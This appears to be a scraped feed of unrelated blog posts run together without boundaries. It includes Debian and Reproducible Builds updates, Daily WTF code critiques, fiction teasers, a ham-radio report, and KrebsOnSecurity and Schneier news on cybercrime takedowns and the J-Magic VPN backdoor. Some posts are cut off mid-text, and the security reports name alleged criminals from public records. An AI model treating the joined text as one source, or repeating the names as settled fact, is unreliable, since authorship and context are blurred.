Do not exit with a traceback if paths are inaccessible, either directly, via symbolic links or within a directory. […]
Don’t cause a traceback if cbfstool extraction failed.. […]
Use the surrogateescape mechanism to avoid a UnicodeDecodeError and crash when any decoding zipinfo output that is not UTF-8 compliant. […]
Testsuite improvements:
Don’t mangle newlines when opening test fixtures; we want them untouched. […]
In addition, fridtjof added support for the ASAR.tar-like archive format. […][…][…][…] and lastly, Vagrant Cascadian updated diffoscope in GNU Guix to version 285 […][…] and 286 […][…].
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-1 was uploaded to Debian unstable by Chris Lamb, making the following the changes:
Clarify the --verbose and non --verbose output of bin/strip-nondeterminism so we don’t imply we are normalizing files that we are not. […]
Update the website’s README to make the setup command copy & paste friendly. […]
Reproducibility testing framework
The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
Ed Maste modified the FreeBSD build system to the clean the object directory before commencing a build. […]
Gioele Barabucci updated the rebuilder stats to first add a category for network errors […] as well as to categorise failures without a diffoscope log […].
Jessica Clarke also made some FreeBSD-related changes, including:
Ensuring we clean up the object directory for second build as well. […][…]
Updating the sudoers for the relevant rm -rf command. […]
Update the cleanup_tmpdirs method to to match other removals. […]
Update the reproducible_debstrap job to call Debian’s debootstrap with the full path […] and to use eatmydata as well […][…].
Make some changes to deduce the CPU load in the debian_live_build job. […]
Lastly, both Holger Levsen […] and Vagrant Cascadian […] performed some node maintenance.
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:
Tim has been working on a large C++ project which has been around for many, many years. It's a tool built for, in Tim's words, "an esoteric field", and most of the developers over the past 30 years have been PhD students.
This particular representative line is present with its original whitespace, and the original variable names. It has been in the code base since 2010.
Assignment::Ptr ra = Assignment::makeAssignment(I,
addr,
func,
block,
RA);
The extra bonus is that Assignment::Ptr is actually an alias for boost::shared_ptr<Assignment>. As you might gather from the name shared_ptr, that's a reference-counted way to manage pointers to memory, and thus avoid memory leaks.
The developers just couldn't tolerate using the names provided by their widely used library solving a widely understood problem, and needed to invent their own names, which made the code less clear. The same is true for makeAssignment. And this pattern is used for nearly every class, because the developers involved didn't understand object lifetimes, when to allow things to be stack allocated, or how ownership should really work in an application.
This is hardly the only WTF in the code, but Tim says:
Preceding the 98 standard, there is a LOT of C-with-classes code. But this representative line speaks to the complete lack of thought that has gone into much of codebase. That whitespace is as-is from the source.
[Advertisement]
Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!
Author: Hillary Lyon The Holographic Wildlife Museum was a major draw for the city, with its representation of Earth’s extinct and endangered animals. Vera loved the idea of viewing facsimiles of majestic creatures in their natural habitats, even if it was through holograms. Besides, hologram technology had come a long way since her youth, when […]
The FBI joined authorities across Europe last week in seizing domain names for Cracked and Nulled, English-language cybercrime forums with millions of users that trafficked in stolen data, hacking tools and malware. An investigation into the history of these communities shows their apparent co-founders quite openly operate an Internet service provider and a pair of e-commerce platforms catering to buyers and sellers on both forums.
In this 2019 post from Cracked, a forum moderator told the author of the post (Buddie) that the owner of the RDP service was the founder of Nulled, a.k.a. “Finndev.” Image: Ke-la.com.
On Jan. 30, the U.S. Department of Justicesaid it seized eight domain names that were used to operate Cracked, a cybercrime forum that sprang up in 2018 and attracted more than four million users. The DOJ said the law enforcement action, dubbed Operation Talent, also seized domains tied to Sellix, Cracked’s payment processor.
In addition, the government seized the domain names for two popular anonymity services that were heavily advertised on Cracked and Nulled and allowed customers to rent virtual servers: StarkRDP[.]io, and rdp[.]sh.
Those archived webpages show both RDP services were owned by an entity called 1337 Services Gmbh. According to corporate records compiled by Northdata.com, 1337 Services GmbH is also known as AS210558 and is incorporated in Hamburg, Germany.
The Cracked forum administrator went by the nicknames “FlorainN” and “StarkRDP” on multiple cybercrime forums. Meanwhile, a LinkedIn profile for a Florian M. from Germany refers to this person as the co-founder of Sellix and founder of 1337 Services GmbH.
Northdata’s business profile for 1337 Services GmbH shows the company is controlled by two individuals: 32-year-old Florian Marzahl and Finn Alexander Grimpe, 28.
An organization chart showing the owners of 1337 Services GmbH as Florian Marzahl and Finn Grimpe. Image: Northdata.com.
Neither Marzahl nor Grimpe responded to requests for comment. But Grimpe’s first name is interesting because it corresponds to the nickname chosen by the founder of Nulled, who goes by the monikers “Finn” and “Finndev.” NorthData reveals that Grimpe was the founder of a German entity called DreamDrive GmbH, which rented out high-end sports cars and motorcycles.
The email address used for those accounts was f.grimpe@gmail.com. DomainTools.com reports f.grimpe@gmail.com was used to register at least nine domain names, including nulled[.]lol and nulled[.]it. Neither of these domains were among those seized in Operation Talent.
Intel471 finds the user FlorainN registered across multiple cybercrime forums using the email address olivia.messla@outlook.de. The breach tracking service Constella Intelligence says this email address used the same password (and slight variations of it) across many accounts online — including at hacker forums — and that the same password was used in connection with dozens of other email addresses, such as florianmarzahl@hotmail.de, and fmarzahl137@gmail.com.
The Justice Department said the Nulled marketplace had more than five million members, and has been selling stolen login credentials, stolen identification documents and hacking services, as well as tools for carrying out cybercrime and fraud, since 2016.
Perhaps fittingly, both Cracked and Nulled have been hacked over the years, exposing countless private messages between forum users. A review of those messages archived by Intel 471 showed that dozens of early forum members referred privately to Finndev as the owner of shoppy[.]gg, an e-commerce platform that caters to the same clientele as Sellix.
Shoppy was not targeted as part of Operation Talent, and its website remains online. Northdata reports that Shoppy’s business name — Shoppy Ecommerce Ltd. — is registered at an address in Gan-Ner, Israel, but there is no ownership information about this entity. Shoppy did not respond to requests for comment.
Constella found that a user named Shoppy registered on Cracked in 2019 using the email address finn@shoppy[.]gg. Constella says that email address is tied to a Twitter/X account for Shoppy Ecommerce in Israel.
The DOJ said one of the alleged administrators of Nulled, a 29-year-old Argentinian national named Lucas Sohn, was arrested in Spain. The government has not announced any other arrests or charges associated with Operation Talent.
Indeed, both StarkRDP and FloraiN have posted to their accounts on Telegram that there were no charges levied against the proprietors of 1337 Services GmbH. FlorainN told former customers they were in the process of moving to a new name and domain for StarkRDP, where existing accounts and balances would be transferred.
“StarkRDP has always been operating by the law and is not involved in any of these alleged crimes and the legal process will confirm this,” the StarkRDP Telegram account wrote on January 30. “All of your servers are safe and they have not been collected in this operation. The only things that were seized is the website server and our domain. Unfortunately, no one can tell who took it and with whom we can talk about it. Therefore, we will restart operation soon, under a different name, to close the chapter [of] ‘StarkRDP.'”
In my last blog, I explained how we resolved a throttling issue involving Azure storage API. In the end, I mentioned that I was not sure of the root cause of the throttling issue.
Even though we no longer had any problem in dev and preprod cluster, we still faced throttling issue with prod. The main difference between these 2 environments is that we have about 80 PVs in prod versus 15 in the other environments. Given that we manage 1500 pods in prod, 80 PVs does not look like a lot.
To continue the investigation, I’ve modified k8s-scheduled-volume-snapshotter to limit the number of snaphots done in a single cron run (see add maxSnapshotCount parameter pull request).
In prod, we used the modified snapshotter to trigger snapshots one by one.
Even with all previous snapshots cleaned up, we could not trigger a single new snapshot without being throttled. I guess that, in the cron job, just checking the list of PV to snapshot was enough to exhaust our API quota.
Azure doc mention that a leaky bucket algorithm is used for throttling. A full bucket holds tokens for 250 API calls, and the bucket gets 25 new tokens per second. Looks like that not enough.
I was puzzled and out of ideas .
I looked for similar problems in AKS issues on GitHub where I found this comment that recommend using useDataPlaneAPI parameter in the CSI file driver. That was it!
I was flabbergasted by this parameter: why is CSI file driver able to use 2 APIs ? Why is one on them so limited ? And more importantly, why is the limited API the default one ?
Anyway, setting useDataPlaneAPI: "true" in our VolumeSnapshotClass manifest was the right solution. This indeed solved the throttling issue in our prod cluster.
But not the snaphot issue . Amongst the 80 PV, I still had 2 snaphots failing.
Fortunately, the error was mentioned in the description of the failed snapshots: we had too many (200) snapshots for these shared volumes.
What ?? All these snapshots were cleaned up last week.
I then tried to delete these snaphots through azure console. But the console failed to delete these snapshot due to API throttling. Looks like Azure console is not using the right API.
Anyway, I went back to the solution explained in my previous blog, I listed all snapshots with az command. I indeed has a lot of snaphots, a lot of them dated Jan 19 and 20. There was often a new bogus snaphot created every minute.
These were created during the first attempt at fixing the throttling issue. I guess that even though CSI file driver was throttled, a snaphot was still created in the storage account, but the CSI driver did not see it and retried a minute later. What a mess.
Anyway, I’ve cleaned up again these bogus snapshot , and now, snaphot creation is working fine .
There are a lot of cases where the submission is "this was server side generated JavaScript and they were loading constants". Which, honestly, is a WTF, but it isn't interesting code. Things like this:
if (false === true)
{
// do stuff
}
That's absolutely the wrong way to do that, and I hate it, but there's just so many times you can say, "send server-side values to the client as an object, not inline".
But Daniel's electrical provider decided to come up with an example of this that really takes it to the next level of grossness.
var isMobile = "" === "true";
var isAndroid = "" === "true";
var isIPad = "" === "true";
var isIPhone = "" === "true";
For starters, they're doing device detection on the server side, which isn't the worst possible idea, but it means they're relying on header fields or worse: the user agent string. Maybe they're checking the device resolution. The fact that they're naming specific devices instead of browser capabilities hints at a terrible hackjob of reactive webdesign- likely someone wrote a bunch of JavaScript that alters the desktop stylesheet to cram the desktop site onto a mobile device. But that's just background noise.
Look at that code.
First, we've got some lovely order-of-operations abuse: === has higher precedence than =, which makes sense but hardly makes this code readable. The first time I saw this, my brain wanted the assignment to happen first.
But what's really special to me is the insistence on making this stringly typed. They control both sides of the code, so they could have just done booleans on both sides. And sure, there's a world where they're just dumb, or didn't trust their templating engine to handle that well.
I've seen enough bad code, though, to have a different suspicion. I can't confirm it, but c'mon, you know in your hearts this is true: the function which is doing device detection returns a string itself, and that string isn't always a boolean for some reason. So they needed to wrap the output in quotes, because that was the only way to make sure that the JavaScript actually could be executed without a syntax error.
I can't be sure that's true from this little snippet. But look at this code, and tell me that someone didn't make that mistake.
[Advertisement]
Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.
Author: Jared S Moya A sharp pain pierced Darya’s side. His knees buckled as he drew his hand to the wound and toppled to the ground. His shoulder slammed into the packed dirt of the dry riverbed, his teeth clacking against each other. Rolling onto his back, he noticed a lancer round had penetrated his […]
A few ago I may have accidentally bought a ring of 12 RGB LEDs; I soldered
temporary leads on it, connected it to a CircuitPython supported board
and played around for a while.
They we had a couple of friends come over to remote FOSDEM together, and
I had talked with one of them about WS2812 / NeoPixels, so I brought
them to the living room, in case there was a chance to show them in
sort-of-use.
Then I was dealing with playing the various streams as we moved from one
room to the next, which lead to me being called “video team”, which lead
to me wearing a video team shirt (from an old DebConf, not FOSDEM, but
still video team), which lead to somebody asking me whether I also had
the sheet with the countdown to the end of the talk, and the answer was
sort-of-yes (I should have the ones we used to use for our Linux Day),
but not handy.
But I had a thing with twelve things in a clock-like circle.
A bit of fiddling on the CircuitPython REPL resulted, if I remember
correctly, in something like:
import board
import neopixel
import time
num_pixels = 12
pixels = neopixel.NeoPixel(board.GP0, num_pixels)
pixels.brightness = 0.1
def end(min):
pixels.fill((0, 0, 0))
for i in range(12):
pixels[i] = (127 + 10 * i, 8 * (12 - i), 0)
pixels[i-1] = (0, 0, 0)
time.sleep(min * 5) # min * 60 / 12
Now, I wasn’t very consistent in running end, especially since I
wasn’t sure whether I wanted to run it at the beginning of the talk with
the full duration or just in the last 5 - 10 minutes depending of the
length of the slot, but I’ve had at least one person agree that the
general idea has potential, so I’m taking these notes to be able to work
on it in the future.
One thing that needs to be fixed is the fact that with the ring just
attached with temporary wires and left on the table it isn’t clear which
LED is number 0, so it will need a bit of a case or something, but
that’s something that can be dealt with before the next fosdem.
And I should probably add some input interface, so that it is
self-contained and not tethered to a computer and run from the REPL.
(And then I may also have a vague idea for putting that ring into some
wearable thing: good thing that I actually bought two :D )
JOIN US IN PERSON AND ONLINE for Ahmed Best's Long Now Talk,Feel the Future: A Valentine's Evening on February 14, 02025 at 7 PM PT at the Herbst Theatre in San Francisco.
Ahmed Best is an award-winning artist, educator, director, the host of the Afrofuturist podcast, and co-founder of the AfroRithm Futures Group, among other pursuits, including his role as Jar Jar Binks in Star Wars: Episode I. Ahmed teaches Dramatic Narrative Design, a course he created for Film and Actor entrepreneurship at USC School of Dramatic Arts. He is also a Senior Fellow at USC Annenberg School for Communication and Journalism, and a visiting professor at Stanford’s Hasso Plattner Institute of Design.
If you could witness one event from the distant past or future, what would it be?
Distant future: I would love to see the first thing that we build — and it might not be a vessel — that can travel at the speed of light.
Distant past: The construction of the Pyramids of Giza. The bricks of the pyramids were formed with almost laser-like precision. I want to see how they did that. Was it a laser? Can you imagine the Egyptians harnessing, say, the power of the sun with a big piece of glass to where they could do a laser-cut of a brick of stone? Had not those who wanted to change the narrative of this civilization destroyed so many things, we might have known how they did it. Right now, it’s a mystery. People like to credit aliens, but I align with Neil deGrasse Tyson on this one: just because they were smarter than you doesn’t mean they came from another planet.
What’s one prediction about the future you’d be willing to make for Long Bets, our arena for accountable predictions?
A thousand years from now, we will have learned to move beyond the planet without carrying the problems of the past with us. This will come through a global cultural revolution. We will be ready to travel through to the stars without harm. We’ll be able to respect where we are going for what “where we are going” demands. We’re not going to impose our ideas of what respect is onto wherever we travel to.
If you had to choose a single artifact to represent our time in a far-future archive, what would it be?
To represent our time, I’d choose the smartphone. The idea of a smartphone was inspired by science fiction, but also there's a longer, almost pseudo-spiritual idea of a smartphone that connects the past to our present.
In his book African Fractals: Modern Computing and Indigenous Design(01999), the mathematician Ron Eglash studied the sand diviners of the Bamana people of Mali, who read peoples’ fortunes by drawing symbols in the sand. Eglash found that this system of divination uses a binary-like logic. Variants of this practice spread from Africa to Spain and the rest of Europe during the Islamic Golden Age, where it was known as geomancy. Leibniz was inspired by geomancy when he created a binary system of ones and zeros, which eventually became the foundation for the development of the digital computer — and, ultimately, the smartphone.
The connection I love to draw is that the primary material of smartphones is silicon, which comes from sand. So, in a sense, when we use our smartphones, we are engaging in a modern form of “sand divination,” just like the ancient sand diviners did in actual sand.
What’s the most surprising way history has repeated itself in your field?
What surprises me most is how every generation puts technology — and the monetary gain it brings — above creativity. The creativity of the time creates a technology of the time, and then everybody focuses so much on replicating the technology but not supporting the creativity that got you there in the first place. It’s a cycle that has repeated itself throughout history. You can see it in the history of music, in writing, in social media — in any kind of storytelling that can be replicated and shared.
Today, we’re at an inflection point where we have so much technology that we build it without having any idea what the use for it is. We put it out there and expect that somebody creative can figure out how to monetize it. We keep putting the creative people — who can actually influence culture in a way that moves us forward optimistically towards change — in a box. We don’t give them the resources to move us forward because we got locked into the amount of technology we can make at a mass scale to acquire as much monetary gain as possible.
Changing this cycle would require a shift in what we choose to value. I’m a big Trekkie; everything comes down to Star Trek. Imagine a Star Trek-like future where human experience, expression and exploration are the commodity and not excess and greed. Unfortunately, we might need Vulcans to come down to make that happen.
What are some books you would recommend for inclusion in The Manual For Civilization, our crowd-curated library of 3,500 books of essential civilizational knowledge?
The Nutmeg’s Curse: Parables for a Planet in Crisis(02021) by Amitav Ghosh. This book explores capitalism and imperialism from the point of view of nutmeg, which was the most expensive commodity on the planet in the 14th and 15th centuries. Nutmeg could buy you a house in Europe. Ghosh brilliantly frames the story of colonization — the very notion of which stemmed from this desire for nutmeg — through a small island in the Indian Ocean that was the only place where nutmeg was found at the time.
Just because you get fired doesn't mean that your pull requests are automatically closed. Dallin was in the middle of reviewing a PR by Steve when the email came out announcing that Steve no longer worked at the company.
Let's take a look at that PR, and maybe we can see why.
This is the original code, which represents operations on investments. An investment is represented by a note, and belongs to one or more partys. The amount that can be drawn is set by a limit, which can belong to either the party or the note.
What our developer was tasked with doing was allow a note to have no limit. This means changing all the places where the note's limit is checked. So this is what they submitted:
You'll note here that the note limit isn't part of calculating the party limits, so both branches do the same thing. And then there's the deeper question of "is a null really the best way to represent this?" especially given that elsewhere in the code they have an "unlimited" flag that disables limit checking.
Now, Steve wasn't let go only for their code- they were just a miserable co-worker who liked to pick fights in pull request comments. So the real highlight of Steve's dismissal was that Dallin got to have a meaningful discussion about the best way to make this change with the rest of the team, and Steve didn't have a chance to disrupt it.
[Advertisement]
Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.
Author: Julian Miles, Staff Writer …And so the seas rose again, while volcanos and storms brought even more devastation and starvation. Those godly ones who led us looked within themselves and made a decision: in their image was the world, and in their image it would be again. But until the disasters abated, they would […]
I was recently pointed to Technologies and Projects supported by the
Sovereign Tech Agency which is financed by the German Federal
Ministry for Economic Affairs and Climate Action. It is a subsidiary of
the Federal Agency for Disruptive Innovation, SPRIND GmbH.
It is worth sending applications there for distinct projects as that is
their preferred method of funding. Distinguished developers can also
apply for a fellowship position that pays up to 40hrs / week (32hrs when
freelancing) for a year. This is esp. open to maintainers of larger
numbers of packages in Debian (or any other Linux distribution).
There might be a chance that some of the Debian-related projects
submitted to the Google Summer of Code that did not get funded could be
retried with those foundations. As per the FAQ of the project:
"The Sovereign Tech Agency focuses on securing and strengthening open
and foundational digital technologies. These communities working on
these are distributed all around the world, so we work with people,
companies, and FOSS communities everywhere."
Similar funding organizations include the Open Technology Fund and
FLOSS/fund. If you have a Debian-related project that fits these
funding programs, they might be interesting options. This list is by no
means exhaustive—just some hints I’ve received and wanted to share. More
suggestions for such opportunities are welcome.
Year of code reviews
On the debian-devel mailing list, there was a long thread titled
"Let's make 2025 a year when code reviews became common in Debian".
It initially suggested something along the lines of:
"Let's review MRs in Salsa." The discussion quickly expanded to
include patches that have
been sitting in the BTS for years, which deserve at least the same
attention. One idea I'd like to emphasize is that associating BTS bugs
with MRs could be very convenient. It’s not only helpful for
documentation but also the easiest way to apply patches.
I’d like to emphasize that no matter what workflow we use—BTS, MRs, or a
mix—it is crucial to uphold Debian’s reputation for high quality.
However, this reputation is at risk as more and more old issues
accumulate. While Debian is known for its technical excellence,
long-standing bugs and orphaned packages remain a challenge. If we don’t
address these, we risk weakening the high standards that Debian is
valued for. Revisiting old issues and ensuring that unmaintained
packages receive attention is especially important as we prepare for the
Trixie release.
Debian Publicity Team will no longer post on X/Twitter
The team is in charge of deciding the most suitable publication
venue or venues for announcements and when they are published.
the team once decided to join Twitter, but circumstances have since
changed. The current Press delegates have the institutional authority to
leave X, just as their predecessors had the authority to join. I
appreciate that the team carefully considered the matter, reinforced by
the arguments developed on the debian-publicity list, and communicated
its reasoning openly.
The RcppUUID package
on CRAN has been providing
UUIDs (based on the underlying Boost
library) for several years. Written by Artem Klemsov and maintained
in this gitlab
repo, the package is a very nice example of clean and
straightforward library binding.
When we did our annual
BH upgrade to 1.87.0 and check reverse dependencies, we noticed the
RcppUUID
needed a small and rather minor update which we showed as a short diff
in an
issue filed. Neither I nor CRAN heard from Artem, so the
packaged ended up being archived last week. Which in turn lead me to
make this minimal update to 1.1.2 to resurrect it, which CRAN processed more or less like a
regular update given this explanation and so it arrived last Friday.
But you know what Canada could make? A Canadian App Store. That’s a store that Canadian software authors could use to sell Canadian apps to Canadian customers, charging, say, the standard payment processing fee of 5% rather than Apple’s 30%. Canada could make app stores for the Android, Playstation and Xbox, too.
There’s no reason that a Canadian app store would have to confine itself to Canadian software authors, either. Canadian app stores could offer 5% commissions on sales to US and global software authors, and provide jailbreaking kits that allows device owners all around the world to install the Canadian app stores where software authors don’t get ripped off by American Big Tech companies.
This was originally posted on SOTA
Forums.
It’s here for completeness of my writing.
To Quote @MM0EFI and the GM0ESS gang, today was a particularly Amateur showing!
Having spent all weekend locked in the curling rink ruining my knees and inflicting mild liver damage in the Aberdeen City Open competition, I needed some outside time away from people to stretch the legs and loosen my knees.
With my teammates/guests shipped off early on account of our quality performance and the days fair drawin’ out now, I found myself with a free afternoon to have a quick run up something nearby before a 1640 sunset! Up the back of Bennachie is a quick steady ascent and in 13 years of living up here I’ve never summited the big hill! Now is as good a time as any. In SOTA terms, this hill is GM/ES-061. In Geographical terms, it’s around 20 miles inland from Aberdeen city here.
I’ve been experimenting with these Aliexpress whips since the end of last year and the forecast wind was low enough to take one into the hills. I cut and terminated 8x 2.5m radials for an effective ground plane last week and wanted to try that against the flat ribbon that it came with.
The ascent was pleasant enough, got to the summit in good time, and out came my Quansheng radio to get the GM/ES-Society on 2m. First my Nagoya whip - called CQ and heard nothing, with general poor reports in WhatsApp I opted to get the slim-g up my aliexpress fibreglass mast.
In an amateur showing last week, I broke the tip of the mast on Cat Law helping 2M0HSK do his first activation due to the wind, and had forgotten this until I summited this week. Squeezing my antenna on was tough, and after many failed attempts to get it up (the mast kept collapsing as I was rushing and not getting the friction hold on each section correctly) and still not hearing anything at all, I changed location and tried again.
In my new position, I received 2M0RVZ 4/4 at best, but he was hearing my 5/9. Similarly GM5ALX and GM4JXP were patiently receiving me loud and clear but I couldn’t hear them at all. I fiddled with settings and decided the receive path of the Quansheng must be fried or sad somehow, but I don’t yet have a full set of diagnostics run.
I’ll take my Anytone on the next hill and compare them against each other I think.
I gave up and moved to HF, getting my whip and new radials into the ground:
Quick to deploy which is what I was after. My new 5m of coax with a choke fitted attached to the radio and we were off to the races - A convenient thing of beauty when it’s up:
I’ve made a single guy with a sotabeams top insulator to brace against wind if need be, but that didn’t need to be used today.
I hit tune, and the G90 spent ages clicking away. In fact, tuning to 14.074, I could only see the famed FT8 signals at S2.
What could be wrong here? Was it my new radials? the whip has behaved before… Minutes turned into tens of minutes playing with everything, and eventually I worked out what was up - my coax only passed signal when I the PL259 connector at the antenna juuuust right. Once I did that, I could take the tuner out the system and work 20 spectacularly well. Until now, I’d been tuning the coax only.
Another Quality Hibby Build Job™️. That’s what’s wrong!
I managed to struggle my way through a touch of QRM and my wonky cable woes to make enough contacts with some very patient chasers and a summit to summit before my frustration at the situation won out, and down the hill I went after a quick pack up period. I managed to beat the sunset - I think if the system had worked fine, I’d have stayed on the hill for sunset.
I think it’s time for a new mast and a coax retermination!
Most of my Debian contributions this month were
sponsored by
Freexian. If you appreciate this sort of work and are at a company that
uses Debian, have a look to see whether you can pay for any of
Freexian‘s services; as well as the direct
benefits, that revenue stream helps to keep Debian development sustainable
for me and several other lovely
people.
You can also support my work directly via
Liberapay.
Python team
We finally made Python 3.13 the default version in testing! I fixed various
bugs that got in the way of this:
I helped with some testing of a debian-installer-utils
patch
as part of the /usr move. I need to get around to uploading this, since
it looks OK now.
Other small things
Helmut Grohne reached out for help debugging a multi-arch coinstallability
problem (you know it’s going to be complicated when even Helmut can’t
figure it out on his own …) in
binutils, and we had a call about that.
We analyzed every instance of AI use in elections collected by the WIRED AI Elections Project (source for our analysis), which tracked known uses of AI for creating political content during elections taking place in 2024 worldwide. In each case, we identified what AI was used for and estimated the cost of creating similar content without AI.
We find that (1) half of AI use isn’t deceptive, (2) deceptive content produced using AI is nevertheless cheap to replicate without AI, and (3) focusing on the demand for misinformation rather than the supply is a much more effective way to diagnose problems and identify interventions.
This tracks with my analysis. People share as a form of social signaling. I send you a meme/article/clipping/photo to show that we are on the same team. Whether it is true, or misinformation, or actual propaganda, is of secondary importance. Sometimes it’s completely irrelevant. This is why fact checking doesn’t work. This is why “cheap fakes”—obviously fake photos and videos—are effective. This is why, as the authors of that analysis said, the demand side is the real problem.
This is yet another story of commercial spyware being used against journalists and civil society members.
The journalists and other civil society members were being alerted of a possible breach of their devices, with WhatsApp telling the Guardian it had “high confidence” that the 90 users in question had been targeted and “possibly compromised.”
It is not clear who was behind the attack. Like other spyware makers, Paragon’s hacking software is used by government clients and WhatsApp said it had not been able to identify the clients who ordered the alleged attacks.
Experts said the targeting was a “zero-click” attack, which means targets would not have had to click on any malicious links to be infected.
Author: Neille Williams “Gramps, a star just fell out of the sky!” Billie hollered out to her Grandpa, who had just poured his second whiskey and was reclining against the kitchen bench. “Sweetie,” he began, ambling over as she pressed her eager face against the window glass, “stars don’t just fall out of the sky, […]
A newly discovered VPN backdoor uses some interesting tactics to avoid detection:
When threat actors use backdoor malware to gain access to a network, they want to make sure all their hard work can’t be leveraged by competing groups or detected by defenders. One countermeasure is to equip the backdoor with a passive agent that remains dormant until it receives what’s known in the business as a “magic packet.” On Thursday, researchers revealed that a never-before-seen backdoor that quietly took hold of dozens of enterprise VPNs running Juniper Network’s Junos OS has been doing just that.
J-Magic, the tracking name for the backdoor, goes one step further to prevent unauthorized access. After receiving a magic packet hidden in the normal flow of TCP traffic, it relays a challenge to the device that sent it. The challenge comes in the form of a string of text that’s encrypted using the public portion of an RSA key. The initiating party must then respond with the corresponding plaintext, proving it has access to the secret key.
The lightweight backdoor is also notable because it resided only in memory, a trait that makes detection harder for defenders. The combination prompted researchers at Lumin Technology’s Black Lotus Lab to sit up and take notice.
[…]
The researchers found J-Magic on VirusTotal and determined that it had run inside the networks of 36 organizations. They still don’t know how the backdoor got installed.
Author: R. J. Erbacher Admiring what lay outside the glass, the vastness of space overwhelmed him. The window on the spacious observation deck was a circular aluminosilicate pane, a meter in circumference, the handles on both sides allowed him to effortlessly hold his prone body suspended in the zero-gravity environment. He didn’t like to come […]
The FBI and authorities in The Netherlands this week seized dozens of servers and domains for a hugely popular spam and malware dissemination service operating out of Pakistan. The proprietors of the service, who use the collective nickname “The Manipulaters,” have been the subject of three stories published here since 2015. The FBI said the main clientele are organized crime groups that try to trick victim companies into making payments to a third party.
One of several current Fudtools sites run by the principals of The Manipulators.
On January 29, the FBI and the Dutch national police seized the technical infrastructure for a cybercrime service marketed under the brands Heartsender, Fudpage and Fudtools (and many other “fud” variations). The “fud” bit stands for “Fully Un-Detectable,” and it refers to cybercrime resources that will evade detection by security tools like antivirus software or anti-spam appliances.
The Dutch authorities said 39 servers and domains abroad were seized, and that the servers contained millions of records from victims worldwide — including at least 100,000 records pertaining to Dutch citizens.
A statement from the U.S. Department of Justice refers to the cybercrime group as Saim Raza, after a pseudonym The Manipulaters communally used to promote their spam, malware and phishing services on social media.
“The Saim Raza-run websites operated as marketplaces that advertised and facilitated the sale of tools such as phishing kits, scam pages and email extractors often used to build and maintain fraud operations,” the DOJ explained.
The core Manipulaters product is Heartsender, a spam delivery service whose homepage openly advertised phishing kits targeting users of various Internet companies, including Microsoft 365, Yahoo, AOL, Intuit, iCloud and ID.me, to name a few.
The government says transnational organized crime groups that purchased these services primarily used them to run business email compromise (BEC) schemes, wherein the cybercrime actors tricked victim companies into making payments to a third party.
“Those payments would instead be redirected to a financial account the perpetrators controlled, resulting in significant losses to victims,” the DOJ wrote. “These tools were also used to acquire victim user credentials and utilize those credentials to further these fraudulent schemes. The seizure of these domains is intended to disrupt the ongoing activity of these groups and stop the proliferation of these tools within the cybercriminal community.”
Manipulaters advertisement for “Office 365 Private Page with Antibot” phishing kit sold via Heartsender. “Antibot” refers to functionality that attempts to evade automated detection techniques, keeping a phish deployed and accessible as long as possible. Image: DomainTools.
KrebsOnSecurity first wrote about The Manipulaters in May 2015, mainly because their ads at the time were blanketing a number of popular cybercrime forums, and because they were fairly open and brazen about what they were doing — even who they were in real life.
We caught up with The Manipulaters again in 2021, with a story that found the core employees had started a web coding company in Lahore called WeCodeSolutions — presumably as a way to account for their considerable Heartsender income. That piece examined how WeCodeSolutions employees had all doxed themselves on Facebook by posting pictures from company parties each year featuring a large cake with the words FudCo written in icing.
A follow-up story last year about The Manipulaters prompted messages from various WeCodeSolutions employees who pleaded with this publication to remove stories about them. The Saim Raza identity told KrebsOnSecurity they were recently released from jail after being arrested and charged by local police, although they declined to elaborate on the charges.
The Manipulaters never seemed to care much about protecting their own identities, so it’s not surprising that they were unable or unwilling to protect their own customers. In an analysis released last year, DomainTools.com found the web-hosted version of Heartsender leaked an extraordinary amount of user information to unauthenticated users, including customer credentials and email records from Heartsender employees.
Almost every year since their founding, The Manipulaters have posted a picture of a FudCo cake from a company party celebrating its anniversary.
DomainTools also uncovered evidence that the computers used by The Manipulaters were all infected with the same password-stealing malware, and that vast numbers of credentials were stolen from the group and sold online.
“Ironically, the Manipulaters may create more short-term risk to their own customers than law enforcement,” DomainTools wrote. “The data table ‘User Feedbacks’ (sic) exposes what appear to be customer authentication tokens, user identifiers, and even a customer support request that exposes root-level SMTP credentials–all visible by an unauthenticated user on a Manipulaters-controlled domain.”
Police in The Netherlands said the investigation into the owners and customers of the service is ongoing.
“The Cybercrime Team is on the trail of a number of buyers of the tools,” the Dutch national police said. “Presumably, these buyers also include Dutch nationals. The investigation into the makers and buyers of this phishing software has not yet been completed with the seizure of the servers and domains.”
U.S. authorities this week also joined law enforcement in Australia, France, Greece, Italy, Romania and Spain in seizing a number of domains for several long-running cybercrime forums and services, including Cracked and Nulled. According to a statement from the European police agency Europol, the two communities attracted more than 10 million users in total.
Other domains seized as part of “Operation Talent” included Sellix, an e-commerce platform that was frequently used by cybercrime forum members to buy and sell illicit goods and services.
Decreasingly hungry thrillseeker
Weaponized Fun
has second thoughts about the risk to which they're willing to expose their palate.
"In addition to Budget Bytes mailing list not knowing who I am, I'm not sure they know what they're making. I'm having a hard time telling whether 'New Recipe 1' sounds more enticing than 'New Recipe 3.' I sure hope they remembered the ingredients."
An anonymous reader frets that
"The Guardian claims an article is *more* than 7 years old (it's not, as of today, January 26)"
Date math is hard.
"Oh snap!" cried
The Beast in Black
I feel like we've seen several errors like this from Firefox recently: problems with 0 and -1 as sentinel values.
Faithful contributor
Michael R.
doubled up on the FB follies this week; here's one. Says Michael
"Those hard tech interviews at META really draw in the best talent."
Finally for this week, a confused
Stewart
found an increasingly rare type of classic Error'd.
"Trying to figure out how to ignore as instructed, when there is no ignore option. Do I just ignore it?"
For completeness, the options should also include Abort
[Advertisement]
ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.
Author: Dart Humeston “Two popular restaurants were closed yesterday while the city health department warned four others.” Tisha, the television news anchor said, her luscious blonde hair framing her stunning face. “This despite the city cutting the health department’s budget by 60%,” said Brad, Tisha’s co-anchor. His jet-black hair was short on the sides, but […]
